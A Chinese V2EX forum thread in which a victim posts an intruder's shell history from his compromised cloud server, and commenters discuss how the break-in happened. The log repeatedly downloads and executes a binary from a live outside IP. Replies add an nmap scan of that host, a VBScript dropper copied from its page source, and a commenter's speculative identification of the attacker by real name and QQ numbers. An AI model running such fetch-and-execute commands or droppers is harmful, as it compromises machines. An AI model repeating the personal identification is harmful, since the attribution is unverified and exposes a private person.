V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
dothis
V2EX  ›  程序员

服务器连续两天被黑、第一次被挖矿、昨天又来、和第一次不同的是、居然有 history 记录、给各位老哥看看,只图一乐

  •  2
     
  •   dothis · 2020-01-07 09:48:18 +08:00 · 24625 次点击
    这是一个创建于 1767 天前的主题,其中的信息可能已经有所发展或是发生改变。

    从 17:01 开始

    avatar

    为了防止上面图片挂掉、文本如下

    21 2020-01-06 09:44:38 crontab -e

    22 2020-01-06 09:45:16 reboot

    23 2020-01-06 09:47:02 top

    24 2020-01-06 17:01:03 top

    25 2020-01-06 17:01:11 ls -l /proc/3557/exe

    26 2020-01-06 17:01:17 netstat -atulnp

    27 2020-01-06 17:01:40 ls -l /proc/1211/exe

    28 2020-01-06 17:01:44 kill -9 1211

    29 2020-01-06 17:01:46 crontab -l

    30 2020-01-06 17:01:47 crontab -r

    31 2020-01-06 17:01:48 crontab -l

    32 2020-01-06 17:01:50 cd /usr/bin/

    33 2020-01-06 17:01:57 rm -rf ftucwfvnpb

    34 2020-01-06 17:02:00 netstat -atulnp

    35 2020-01-06 17:02:03 w

    36 2020-01-06 17:02:05 cd /root/

    37 2020-01-06 17:02:07 cd /bin/

    38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java

    39 2020-01-06 17:02:19 rm -rf java.1

    40 2020-01-06 17:02:20 cd /root/

    41 2020-01-06 17:02:21 cd /opt/

    42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java

    43 2020-01-06 17:02:35 chmod 777 java

    44 2020-01-06 17:02:36 ./java

    45 2020-01-06 17:02:38 cd /root/

    46 2020-01-06 17:02:41 ps -xua

    47 2020-01-06 17:03:28 netstat -atulnp

    48 2020-01-06 17:03:47 kill -9 4689

    49 2020-01-06 17:03:51 netstat -atulnp

    50 2020-01-06 17:04:02 cd /etc/

    51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163

    52 2020-01-06 17:04:15 rm -rf java

    53 2020-01-06 17:04:16 cd /root/

    54 2020-01-06 17:04:17 cd /bin/

    55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java

    56 2020-01-06 17:04:28 rm -rf java.1

    57 2020-01-06 17:04:30 cd /root/

    58 2020-01-06 17:04:31 cd /opt/

    59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java

    60 2020-01-06 17:04:36 chmod 777 java

    61 2020-01-06 17:04:39 ./java

    62 2020-01-06 17:04:42 cd /root/

    63 2020-01-06 17:04:44 netstat -atulnp

    64 2020-01-06 17:04:51 ifconfig

    65 2020-01-06 17:04:54 history

    66 2020-01-06 17:05:01 netstat -atulnp

    67 2020-01-06 17:05:42 cd /ro

    68 2020-01-06 17:05:43 cd /root/

    69 2020-01-06 17:05:46 history

    70 2020-01-06 17:05:53 ifconfig

    71 2020-01-06 17:05:54 history

    72 2020-01-06 17:05:58 w

    73 2020-01-06 17:06:00 history

    74 2020-01-06 17:06:24 ifconfig

    75 2020-01-06 17:06:27 history

    76 2020-01-06 17:06:29 history

    77 2020-01-06 17:06:29 history

    第 1 条附言  ·  2020-01-07 10:55:53 +08:00

    附上这两天我自己服务器的资源截图、应该还是盗走了点东西、不过还好、没啥重要的

    avatar

    66 条回复    2020-01-11 14:16:59 +08:00
    defunct9
        1
    defunct9  
       2020-01-07 09:52:44 +08:00
    有意思
    dothis
        2
    dothis  
    OP
       2020-01-07 09:53:18 +08:00
    里面还有这个人对应的 云服务器地址 手动狗头
    ihciah
        3
    ihciah  
       2020-01-07 09:54:26 +08:00 via iPhone
    这是啥机器,挖出来的币有人工的时间值钱吗
    mangoDB
        4
    mangoDB  
       2020-01-07 09:56:07 +08:00
    感觉对方功夫不到家
    avalon0624
        5
    avalon0624  
       2020-01-07 10:01:13 +08:00
    居然用的还是国内的 ip 做,忘了服务器要实名的么?
    dapang1221
        6
    dapang1221  
       2020-01-07 10:01:41 +08:00
    这这这…纯手动的吗,真就服务器一日游啊,翻遍了。。。
    yEhwG10ZJa83067x
        7
    yEhwG10ZJa83067x  
       2020-01-07 10:03:31 +08:00
    http://101.201.76.232:8082
    可以打开
    oneisall8955
        8
    oneisall8955  
       2020-01-07 10:04:58 +08:00 via Android
    有趣有趣
    dothis
        10
    dothis  
    OP
       2020-01-07 10:10:35 +08:00
    @ihciah 我是腾讯云 2 核 8G5M 的机器

    @mangoDB 哈哈、是的、我已经够菜了、他比我还菜

    @avalon0624 是的、不过这不是最骚的、最骚的是还能访问、笑死了

    @dapang1221 我也感觉、纯手动、第一次挖矿搞的还挺像样子的、这一次直接手动、并且最后好像是放弃了?因为这次好像没有成功植入病毒、只是腾讯云那边给了个提醒
    dothis
        11
    dothis  
    OP
       2020-01-07 10:17:49 +08:00
    @moonheart 系统里面没啥、就跑一些自己的小工具、多谢提醒
    afirefish
        12
    afirefish  
       2020-01-07 10:22:32 +08:00
    北京 阿里云?
    ReZer0
        13
    ReZer0  
       2020-01-07 10:23:44 +08:00
    话说我好奇的点在于是怎么被黑进去的……
    rongyiran
        14
    rongyiran  
       2020-01-07 10:27:31 +08:00
    用的是肉鸡控制你的啊.
    gearfox
        15
    gearfox  
       2020-01-07 10:28:13 +08:00
    还是个爱打 cs 的朋友
    dothis
        16
    dothis  
    OP
       2020-01-07 10:31:57 +08:00
    @afirefish 是的、对方是北京阿里云

    @ReZer0 目前我很怀疑是 BT 导致的、因为我自己的安装 BT 没多久、同时我们公司服务器、我也想安装一个 BT 想使用起来(图方便)、结果还没用、周末就中毒(就隔天)、很多文件都被删了。辛亏有快照、不然直接凉。目前只是解决问题。
    mango88
        17
    mango88  
       2020-01-07 10:54:43 +08:00
    惊了,CS
    LengthMin
        18
    LengthMin  
       2020-01-07 10:56:02 +08:00
    BT 是宝塔吗?
    afirefish
        19
    afirefish  
       2020-01-07 10:58:56 +08:00
    @dothis BT 是宝塔吗?我一台腾讯云的服务器上面也跑了 BT,目前暂时还没有被黑过(或者是我菜,不知道被黑了)。不过我一般在腾讯云的安全组里面吧宝塔管理面板和 SSH 的端口都关了的,要用的时候再打开。
    Pzqqt
        20
    Pzqqt  
       2020-01-07 11:05:34 +08:00
    @justrand 访问 http://101.201.76.232 之后返回 Nginx 欢迎页面 然后火绒报毒。。。
    dothis
        21
    dothis  
    OP
       2020-01-07 11:07:25 +08:00
    @LengthMin @afirefish 是的、目前只是怀疑、因为时间上太巧了。

    目前我本地服务器(linux):完全按照官方要求、开了对应的端口;使用了 ftp、mysql 这些;
    公司服务器(windows):只是安装了宝塔、本地可以运行访问、外网 ip 和端口都没开、后来准备过两天用起来、就又把服务关闭了、隔天就中招
    different
        22
    different  
       2020-01-07 11:10:10 +08:00
    你也挺有意思,你的重点在于别人有多菜,而不是你的服务器怎么被别人黑进来了?
    LengthMin
        23
    LengthMin  
       2020-01-07 11:14:48 +08:00
    还有一个:之前看过一篇文章,因为宝塔里开启的 phpmyadmin 的 888 端口也是暴露在公网的,所以就怎么怎么怎么就进去 shell 了
    dothis
        24
    dothis  
    OP
       2020-01-07 11:23:57 +08:00
    @different 哈哈、老哥、我就是当一个笑话分享出来让大家一乐、我自己也很菜啊、不过感觉他的操作确实逗笑我了
    原因有找过、不过就是因为我自己菜、没办法找到、不好意思、忘老哥谅解
    公司服务器目前我只是反馈了一下我做了哪些操作、最终是由供应商去解决、也开会自我反省过了。

    @LengthMin 多谢老哥、我去了解学习一下
    opengps
        25
    opengps  
       2020-01-07 11:25:10 +08:00
    公网环境就是这么恶劣,学学防御吧,最基本的:换端口,强密码,严格的防火墙
    ZRS
        26
    ZRS  
       2020-01-07 11:40:03 +08:00 via iPhone
    怎么摸进来的
    dorothyREN
        27
    dorothyREN  
       2020-01-07 11:49:27 +08:00
    我 sqlserver 1 号一大早被删库了。。。
    shawshi
        28
    shawshi  
       2020-01-07 12:02:51 +08:00
    估计那个服务器还是肉鸡
    shawshi
        29
    shawshi  
       2020-01-07 12:03:03 +08:00
    估计那个服务器也是肉鸡
    AmosAlbert
        30
    AmosAlbert  
       2020-01-07 12:13:40 +08:00
    看这操作,你的服务器成靶场了 :)
    guanhui07
        31
    guanhui07  
       2020-01-07 12:26:21 +08:00
    阿里云..
    darknoll
        32
    darknoll  
       2020-01-07 12:48:13 +08:00   ❤️ 1
    不是通过密码登录进来的?
    no1xsyzy
        33
    no1xsyzy  
       2020-01-07 12:49:16 +08:00
    http://101.201.76.232:8082 的 “HFS” 页面里面是没有显示 /java 的
    但 :80 带 Trojan-Dropper.VBS.Agent (卡巴斯基) 或者叫 TrojanDropper/Ramnit.f (火绒)
    让我有点疑惑
    直接报给 CNCERT 吧。
    hiya5
        34
    hiya5  
       2020-01-07 12:53:22 +08:00
    他通过密码登录进来的吗
    atonku
        35
    atonku  
       2020-01-07 13:21:23 +08:00
    你黑不了他的服务器,所以你比他菜。
    lostpg
        36
    lostpg  
       2020-01-07 13:21:59 +08:00 via Android
    感觉这是直接密码登 root 用户进来了,如果再是弱密码,不就是开着大门睡觉了。。。
    dothis
        37
    dothis  
    OP
       2020-01-07 13:32:54 +08:00
    @opengps 是的啊、经过这次事件、是要加强学习一下运维方面的知识了
    @ZRS 不清楚、目前怀疑是因为宝塔、尝试找原因未找到
    @dorothyREN 卧槽、你这比我更狠
    @darknoll @hiya5 @lostpg 应该不是、我的密码很复杂
    @atonku 哈哈、 有道理。我收回之之前他比我菜的话。
    Mogugugugu
        38
    Mogugugugu  
       2020-01-07 13:52:03 +08:00
    http://101.201.76.232 是个 nginx 页面,用的是 tomcat 的 fav.ico , 然后右键看一下源码、有意思、
    puzzle9
        39
    puzzle9  
       2020-01-07 14:17:48 +08:00
    @Mogugugugu 确实有意思 不过这种病毒对现代浏览器应该失效了把
    xmi
        40
    xmi  
       2020-01-07 14:23:37 +08:00
    @Pzqqt 我的也报毒了, 但是直接给放行了是什么情况? 有没有问题的?
    songco
        41
    songco  
       2020-01-07 15:16:55 +08:00
    Starting Nmap ( https://nmap.org ) at 2020-01-07 09:14 EET
    NSE: Loaded 40 scripts for scanning.
    Initiating Ping Scan at 09:14
    Scanning 101.201.76.232 [4 ports]
    Completed Ping Scan at 09:14, 0.47s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 09:14
    Scanning 101.201.76.232 [100 ports]
    Discovered open port 1025/tcp on 101.201.76.232
    Discovered open port 139/tcp on 101.201.76.232
    Discovered open port 135/tcp on 101.201.76.232
    Discovered open port 80/tcp on 101.201.76.232
    Discovered open port 3389/tcp on 101.201.76.232
    Discovered open port 1027/tcp on 101.201.76.232
    Discovered open port 1026/tcp on 101.201.76.232
    Completed SYN Stealth Scan at 09:14, 2.94s elapsed (100 total ports)
    Initiating Service scan at 09:14
    Scanning 7 services on 101.201.76.232
    Completed Service scan at 09:15, 59.26s elapsed (7 services on 1 host)
    NSE: Script scanning 101.201.76.232.
    Initiating NSE at 09:15
    Completed NSE at 09:15, 2.96s elapsed
    Initiating NSE at 09:15
    Completed NSE at 09:15, 0.00s elapsed
    Nmap scan report for 101.201.76.232
    Host is up (0.21s latency).
    Not shown: 77 closed ports
    PORT STATE SERVICE VERSION
    80/tcp open http nginx 1.9.12
    81/tcp filtered hosts2-ns
    111/tcp filtered rpcbind
    119/tcp filtered nntp
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    427/tcp filtered svrloc
    445/tcp filtered microsoft-ds
    515/tcp filtered printer
    646/tcp filtered ldp
    1025/tcp open msrpc Microsoft Windows RPC
    1026/tcp open msrpc Microsoft Windows RPC
    1027/tcp open msrpc Microsoft Windows RPC
    1029/tcp filtered ms-lsa
    3389/tcp open ms-wbt-server Microsoft Terminal Service
    4899/tcp filtered radmin
    5000/tcp filtered upnp
    5101/tcp filtered admdog
    5357/tcp filtered wsdapi
    5800/tcp filtered vnc-http
    5900/tcp filtered vnc
    6001/tcp filtered X11:1
    49152/tcp filtered unknown
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 66.38 seconds
    Raw packets sent: 182 (7.984KB) | Rcvd: 137 (5.516KB)
    randomtree451
        42
    randomtree451  
       2020-01-07 15:30:07 +08:00
    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = ""
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>
    tengyoubiao
        43
    tengyoubiao  
       2020-01-07 15:50:25 +08:00
    这是挂了个感染 HTML 的木马?
    Achiii
        44
    Achiii  
       2020-01-07 16:43:09 +08:00
    试过被利用 tp 漏洞挂马,后来过滤 post 参数关键字解决的
    black11black
        45
    black11black  
       2020-01-07 21:23:08 +08:00
    老哥,说一下你这个查看用户历史记录的命令是啥呗
    wqshare
        46
    wqshare  
       2020-01-07 21:31:36 +08:00
    看看这老哥的 80 端口页,用 vbs 挂了个马上去,哈哈
    xupefei
        47
    xupefei  
       2020-01-07 21:44:37 +08:00 via iPhone
    不要对公网开 yarn 端口
    rootx
        48
    rootx  
       2020-01-07 22:11:35 +08:00
    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = ""
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>
    dorothyREN
        49
    dorothyREN  
       2020-01-08 00:55:30 +08:00
    @dothis #37 数据库没备份,只有日志,恢复起来贼特么慢,搞了两天才恢复完数据
    msg7086
        50
    msg7086  
       2020-01-08 01:46:06 +08:00   ❤️ 1
    公司服务器装宝塔?佩服佩服。
    HTSdTt3WygdgQQGe
        51
    HTSdTt3WygdgQQGe  
       2020-01-08 02:12:03 +08:00 via Android
    你马上报案,说数据库丢了价值一个亿的机密资料,让阿里去查
    vvqqdd
        52
    vvqqdd  
       2020-01-08 04:11:58 +08:00
    这个服务器有个图片,点开是哥🐎,名字叫做 nknmn。。。顾名思义 哈哈
    KasuganoSoras
        53
    KasuganoSoras  
       2020-01-08 04:56:49 +08:00
    在他的服务器上看到一张图片叫 “战鹰部落 MC 服务器”,正好我也是开 MC 服务器的,好奇搜了一下,找到了他们的服务器,QQ 群是 139888565,群主 QQ 是 565621504,昵称叫 NullPointerException,结合前面执行的命令以及文件名里面都含有 Java,我觉得八九不离十,楼主有兴趣可以自己去会会他?
    KasuganoSoras
        54
    KasuganoSoras  
       2020-01-08 05:04:08 +08:00   ❤️ 5
    https://www.mcbbs.net/thread-675592-1-1.html
    2017 年的时候曾经在我的世界中文论坛发过贴说自己的服务器被 DDoS 了 9.6Gbps 流量,然后从他的个人空间找到一个域名 www.zhanyingwl.com ,打开发现 502,是 360 云盾的界面,然后我想了下既然是用的 360 CDN,那这域名肯定有备案吧。然后又去查了一下备案号,果然。
    尹伊君 个人 鲁 ICP 备 18039840 号-1 战鹰网络技术站 www.zhanyingwl.com
    只能帮你到这里了(笑
    cydian
        55
    cydian  
       2020-01-08 06:12:17 +08:00 via Android
    @KasuganoSoras 可以打开 不是 502
    webshe11
        56
    webshe11  
       2020-01-08 08:17:53 +08:00
    真就用宝塔呗
    Pzqqt
        57
    Pzqqt  
       2020-01-08 08:58:35 +08:00
    @xmi 参考 38 楼 病毒是藏在页面源码里的 在页面源码下方有一段恶意 VBScript 代码 可以看出这段代码只对 Windows 系统有影响
    dothis
        58
    dothis  
    OP
       2020-01-08 08:58:44 +08:00
    @black11black 终端下直接敲 history 就可以看
    @msg7086 我自己服务器用的、感觉贼舒服、然后公司的服务器也想用、最后没用起来就凉了、以后不敢用这些东西了、自己玩玩还行
    @dorothyREN。。。这就很难受了、我这边有快照、简单很多
    @KasuganoSoras 卧槽、老哥稳、多谢了
    qanniu
        59
    qanniu  
       2020-01-08 08:59:19 +08:00
    @KasuganoSoras 大佬 v5
    xiaoxiongmao
        60
    xiaoxiongmao  
       2020-01-08 09:14:18 +08:00
    @KasuganoSoras 厉害了老哥
    HFX3389
        61
    HFX3389  
       2020-01-08 09:16:56 +08:00
    @msg7086 #50 不懂....公司服务器装宝塔会有啥问题呀?
    1239305697
        62
    1239305697  
       2020-01-08 15:26:08 +08:00
    @Pzqqt @xmi 我的没有报毒。。难道我的电脑要中毒了吗。。
    1239305697
        63
    1239305697  
       2020-01-08 16:08:30 +08:00
    https://i.loli.net/2020/01/08/4jzJxGk3Z7LheDU.png 龟龟,我打开了那个地址,然后居然真的就中了。。。
    1239305697
        64
    1239305697  
       2020-01-08 16:16:01 +08:00
    打开了楼上那个 ip 地址而且没被安全软件报毒的建议全盘扫描一下电脑,我的中了。。
    msg7086
        65
    msg7086  
       2020-01-08 17:14:23 +08:00
    @HFX3389 非自由软件,又没强大到企业级商用。
    源代码提交没有太多有意义的信息,代码没有经过大量审计。
    给公司服务器装,反正我是不敢的。胆大的敢装的我是非常佩服的。
    maxbon
        66
    maxbon  
       2020-01-11 14:16:59 +08:00
    这个记录笑死了,最开始跑一遍是发现没跑成功又删掉重下吗
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5377 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 39ms · UTC 09:04 · PVG 17:04 · LAX 01:04 · JFK 04:04
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.